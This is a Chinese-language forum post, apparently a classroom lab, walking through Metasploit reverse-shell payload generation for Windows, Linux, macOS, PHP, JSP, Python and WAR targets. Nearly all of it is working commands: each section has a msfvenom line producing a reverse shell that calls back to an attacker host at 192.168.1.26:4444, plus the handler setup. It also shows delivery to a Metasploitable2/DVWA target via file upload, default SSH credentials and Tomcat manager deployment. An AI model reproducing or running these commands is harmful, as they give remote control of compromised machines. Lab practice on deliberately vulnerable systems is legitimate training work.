metasploit 各种payload生成利用-女黑客 - Powered by Discuz! Archiver

nvhack 发表于 2023-2-2 13:19:43

metasploit 各种payload生成利用

metasploit 课堂实验

一,windows 被控端实验
生成:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.26 LPORT=4444 -f exe > shell.exemsf 监听:
#监听
use exploit/multi/handler
set payloadwindows/meterpreter/reverse_tcp
set lhost 192.168.1.26
set lport 4444
exploit
二,linux下被控端实验
生成:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.26 LPORT=4444 -f elf > shell.elfmsf 监听:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.1.26
set lport 4444
exploit

三:mac 被控端实验
生成:<blockquote>msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.11 LPORT=4444 -f macho > shell.macho
msf 监听:
use exploit/multi/handler
set osx/x86/shell_reverse_tcp
set lhost 192.168.1.26
set lport 4444
exploit

四:php 被控端 实验
生成:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.21 LPORT=4444 -f raw > shell.phpmsf 监听:
use exploit/multi/handler
set php/meterpreter_reverse_tcp
set lhost 192.168.1.26
set lport 4444
exploit在目标主机浏览shell.php,会显示旋转


等待一会,kali会上线

经过测试,有BUG,会超时。


暂且修改php运行时间和内存限制,在配置文件php.ini中修改
max_execution_time = 3000 #最大执行时间
memory_limit = 2048M# n内存限制为多大经测试,还是无效,但是在控制端一直有操作则不会超时,停止操作一会就会超时。


五:JSP 被控端实验
这里使用 metasploitable2靶机作为目标实验对象
生成:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.26 LPORT=4444 -f raw > shell.jsp


把shell.jsp通过metasploitable2靶机中的dvwa的文件上传功能上传到靶机里。
dvwa: http://192.168.1.25/dvwa

登录metasploitable2靶机
ssh msfadmin@192.168.1.25 #密码是msfadmin执行命令
mv /var/www/dvwa/hackable/uploads/shell.jsp /usr/share/tomcat5.5/server/webapps/manager/shell.jspmsf 监听:
use exploit/multi/handler
set java/jsp_shell_reverse_tcp
set lhost 192.168.1.26
set lport 4444
exploit

# 然后打开浏览器 浏览 http://192.168.1.25:8180/manager/shell.jsp
上线:


六:Python 被控端实验
生成:msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.26 LPORT=4444 -f raw > shell.py
把shell.py通过metasploitable2靶机中的dvwa的文件上传功能上传到靶机里。
dvwa: http://192.168.1.25/dvwa

登录metasploitable2靶机
ssh msfadmin@192.168.1.25 #密码是msfadmin给shell.py 执行权限 chmod +x 目标文件
sudo chmod +x/var/www/dvwa/hackable/uploads/shell.pymsf 监听:
use exploit/multi/handler
set payload cmd/unix/reverse_python
set lhost 192.168.1.26
set lport 4444
exploit
#目标机执行文件shell.py
sudo /var/www/dvwa/hackable/uploads/shell.py
七:war包被控端

生成被控端,使用metasploitable2 作为靶机实验
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.26 LPORT=4444 -f war > shell.war

浏览靶机 http://192.168.1.25:8180/

登录后在页面下方部署war包

点击 Deploy

查看shell.war 包内容,使用winrar就可以查看

浏览器访问:http://192.168.1.25:8180/shell/usaafdfxze.jsp


有主机上线请注意










页: [1]
查看完整版本: metasploit 各种payload生成利用